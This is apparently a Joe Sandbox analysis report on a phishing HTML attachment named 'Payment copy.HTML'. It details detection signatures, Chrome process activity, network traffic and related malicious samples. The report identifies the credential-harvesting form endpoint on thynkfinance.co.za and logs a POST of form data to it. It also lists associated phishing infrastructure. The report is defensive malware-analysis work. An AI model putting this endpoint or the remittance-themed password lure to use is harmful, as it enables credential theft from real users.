Edit tour

Windows Analysis Report
Payment copy.HTML

Overview

General Information

Sample name:Payment copy.HTML
Analysis ID:1655135
MD5:a84eb8ccb518dc96f1d4f0f2f53556df
SHA1:b0f17a8f02660f37f12f8c70c3cb45411a40eb5d
SHA256:d73a1e132450df375107353e0ccfa8de5916a645252a807ba2f3f1f70d2afbaa
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
None HTTPS page querying sensitive user data (password, username or email)
Suspicious form URL found

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 7396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2056,i,7512422396215173747,8855882059684338427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2096 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 3932 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Payment copy.HTML" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://thynkfinance.co.za/admin/save/mer.phpAvira URL Cloud: Label: phishing

Phishing

barindex
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.0.pages.csv
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLTab title: REMITTANCE
Source: Payment copy.HTMLHTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: Number of links: 0
Source: Payment copy.HTMLHTTP Parser: Title: REMITTANCE does not match URL
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: Title: REMITTANCE does not match URL
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: Has password / email / username input fields
Source: Payment copy.HTMLHTTP Parser: Form action: https://thynkfinance.co.za/admin/save/mer.php
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: Form action: https://thynkfinance.co.za/admin/save/mer.php
Source: Payment copy.HTMLHTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: <input type="password" .../> found
Source: Payment copy.HTMLHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: No favicon
Source: https://i.ibb.co/nBXYTs4/wrong-details.jpgHTTP Parser: No favicon
Source: Payment copy.HTMLHTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: No <meta name="author".. found
Source: Payment copy.HTMLHTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 142.250.80.4:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 154.0.165.249:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 154.0.165.249:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.131.251:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.131.251:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 207.174.26.219 207.174.26.219
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 142.251.41.3
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 104.70.121.145
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.148
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.24.148
Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /nBXYTs4/wrong-details.jpg HTTP/1.1Host: i.ibb.coConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://i.ibb.co/nBXYTs4/wrong-details.jpgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: simgbb.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://i.ibb.co/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: simgbb.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: thynkfinance.co.za
Source: global trafficDNS traffic detected: DNS query: i.ibb.co
Source: global trafficDNS traffic detected: DNS query: simgbb.com
Source: unknownHTTP traffic detected: POST /admin/save/mer.php HTTP/1.1Host: thynkfinance.co.zaConnection: keep-aliveContent-Length: 56Cache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Origin: nullContent-Type: application/x-www-form-urlencodedUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: Payment copy.HTMLString found in binary or memory: https://thynkfinance.co.za/admin/save/mer.php
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownHTTPS traffic detected: 142.250.80.4:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 154.0.165.249:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 154.0.165.249:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.131.251:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.131.251:443 -> 192.168.2.4:49749 version: TLS 1.2

System Summary

barindex
Source: Name includes: Payment copy.HTMLInitial sample: payment
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7396_1416000944Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7396_1416000944Jump to behavior
Source: classification engineClassification label: mal68.phis.winHTML@24/5@10/5
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2056,i,7512422396215173747,8855882059684338427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2096 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Payment copy.HTML"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2056,i,7512422396215173747,8855882059684338427,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2096 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Stealing of Sensitive Information

barindex
Source: file:///C:/Users/user/Desktop/Payment%20copy.HTMLHTTP Parser: file:///C:/Users/user/Desktop/Payment%20copy.HTML
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1655135 Sample: Payment copy.HTML Startdate: 03/04/2025 Architecture: WINDOWS Score: 68 22 Antivirus detection for URL or domain 2->22 24 AI detected phishing page 2->24 26 HTML document with suspicious name 2->26 28 2 other signatures 2->28 6 chrome.exe 2 2->6         started        9 chrome.exe 2->9         started        process3 dnsIp4 14 192.168.2.4, 138, 443, 49380 unknown unknown 6->14 11 chrome.exe 6->11         started        process5 dnsIp6 16 i.ibb.co 207.174.26.219, 443, 49744, 49746 RCN-ASUS United States 11->16 18 www.google.com 142.250.80.4, 443, 49733, 49755 GOOGLEUS United States 11->18 20 2 other IPs or domains 11->20

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
file:///C:/Users/user/Desktop/Payment%20copy.HTML0%Avira URL Cloudsafe
https://thynkfinance.co.za/admin/save/mer.php100%Avira URL Cloudphishing

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
simgbb.com
172.67.131.251
truefalse
    high
    www.google.com
    142.250.80.4
    truefalse
      high
      thynkfinance.co.za
      154.0.165.249
      truefalse
        unknown
        i.ibb.co
        207.174.26.219
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://thynkfinance.co.za/admin/save/mer.phpfalse
          • Avira URL Cloud: phishing
          unknown
          https://simgbb.com/images/favicon.pngfalse
            high
            file:///C:/Users/user/Desktop/Payment%20copy.HTMLtrue
            • Avira URL Cloud: safe
            unknown
            https://i.ibb.co/favicon.icofalse
              high
              https://i.ibb.co/nBXYTs4/wrong-details.jpgfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                207.174.26.219
                i.ibb.coUnited States
                6079RCN-ASUSfalse
                172.67.131.251
                simgbb.comUnited States
                13335CLOUDFLARENETUSfalse
                142.250.80.4
                www.google.comUnited States
                15169GOOGLEUSfalse
                154.0.165.249
                thynkfinance.co.zaSouth Africa
                37611AfrihostZAfalse
                IP
                192.168.2.4
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1655135
                Start date and time:2025-04-03 00:52:52 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 30s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Payment copy.HTML
                Detection:MAL
                Classification:mal68.phis.winHTML@24/5@10/5
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .HTML
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.80.110, 172.217.165.131, 142.251.40.142, 172.253.122.84, 142.251.40.174, 142.250.64.110, 142.250.80.78, 142.250.65.174, 23.203.176.221, 199.232.210.172, 142.251.40.206, 142.251.35.174, 172.217.165.142, 142.250.65.227, 142.250.65.206, 142.250.72.99, 142.251.40.238, 142.250.81.238, 142.251.32.110, 142.250.176.206, 142.251.40.110, 184.31.69.3, 4.245.163.56
                • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, ocsp.digicert.com, update.googleapis.com, clients.l.google.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                207.174.26.219https://hidrive.ionos.com/lnk/MyScbyomUGet hashmaliciousHTMLPhisherBrowse
                  Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                    F Notice Docx 433 (1).htmlGet hashmaliciousHTMLPhisherBrowse
                      https://orgfarm-4ccb539e27-dev-ed.develop.my.salesforce-sites.com/Get hashmaliciousUnknownBrowse
                        Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                          Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                            roblox.exeGet hashmaliciousXWormBrowse
                              WizClient.exeGet hashmaliciousXWormBrowse
                                XC.exeGet hashmaliciousXWormBrowse
                                  FINAL -Legal Notice Presentation (1).pptxGet hashmaliciousHTMLPhisherBrowse
                                    172.67.131.251Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                                      Payment.pdfGet hashmaliciousHTMLPhisherBrowse
                                        https://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=zoom-meeting.top/scJF1SSXVzFB/zFBa2scJF17067/HkeS73tjSSXV1331248624633021?HkeS73tjSSXV1331248624633021=Yy5iYWtrZXJAbWVkaXJldmEubmw=Get hashmaliciousHTMLPhisherBrowse
                                          154.0.165.249Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            i.ibb.cohttps://hidrive.ionos.com/lnk/MyScbyomUGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                                            • 207.174.26.219
                                            F Notice Docx 433 (1).htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            https://orgfarm-4ccb539e27-dev-ed.develop.my.salesforce-sites.com/Get hashmaliciousUnknownBrowse
                                            • 207.174.26.219
                                            Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            roblox.exeGet hashmaliciousXWormBrowse
                                            • 207.174.26.219
                                            WizClient.exeGet hashmaliciousXWormBrowse
                                            • 207.174.26.219
                                            XC.exeGet hashmaliciousXWormBrowse
                                            • 207.174.26.219
                                            FINAL -Legal Notice Presentation (1).pptxGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            thynkfinance.co.zaPayment Remittance.pdfGet hashmaliciousUnknownBrowse
                                            • 154.0.165.249
                                            simgbb.comPayment Remittance.pdfGet hashmaliciousUnknownBrowse
                                            • 172.67.131.251
                                            Payment.pdfGet hashmaliciousHTMLPhisherBrowse
                                            • 104.21.4.104
                                            AGREEMENT AND APPROVAL REPORT DIAMOND TRAILER 2024-502244_6.5.248.pdfGet hashmaliciousUnknownBrowse
                                            • 104.21.4.104
                                            https://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=zoom-meeting.top/scJF1SSXVzFB/zFBa2scJF17067/HkeS73tjSSXV1331248624633021?HkeS73tjSSXV1331248624633021=Yy5iYWtrZXJAbWVkaXJldmEubmw=Get hashmaliciousHTMLPhisherBrowse
                                            • 104.21.4.104
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            RCN-ASUSxd.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 207.96.68.177
                                            xd.x86_64.elfGet hashmaliciousMiraiBrowse
                                            • 216.164.110.37
                                            https://hidrive.ionos.com/lnk/MyScbyomUGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            xd.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 207.175.75.148
                                            xd.x86.elfGet hashmaliciousMiraiBrowse
                                            • 66.44.1.128
                                            Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                                            • 207.174.26.219
                                            F Notice Docx 433 (1).htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            https://orgfarm-4ccb539e27-dev-ed.develop.my.salesforce-sites.com/Get hashmaliciousUnknownBrowse
                                            • 207.174.26.219
                                            Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            Presentation Of Court Order_Letter.pptxGet hashmaliciousHTMLPhisherBrowse
                                            • 207.174.26.219
                                            CLOUDFLARENETUShttp://www.standupforkids.orgGet hashmaliciousUnknownBrowse
                                            • 104.19.229.21
                                            Payment Error.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 104.21.48.1
                                            https://e-hazard.com/arc-flash-training/advanced-electrical-safety-for-key-personnel/Get hashmaliciousUnknownBrowse
                                            • 104.16.123.96
                                            https://microsoft365.craft.me/documentGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 104.21.27.108
                                            http://found19.z20.web.core.windows.net/werrx01USAHTML/index.htmlGet hashmaliciousUnknownBrowse
                                            • 1.1.1.1
                                            http://selecthealth.nationsbenefits.comGet hashmaliciousUnknownBrowse
                                            • 172.67.218.119
                                            https://vqr.vc/6ossVvCJoGet hashmaliciousUnknownBrowse
                                            • 104.18.27.193
                                            https://storage.googleapis.com/kzrzrzrzrzr/wattere.html#/redirect.html?od=1syb67eb1c8583e99_vl_topvl_1544.54qf18g.C0000rjawyf2czq00l_x11480.jawyf%5DM3hoeHE4LTA3YzBjcmM0u6NviGet hashmaliciousPhisherBrowse
                                            • 104.18.121.34
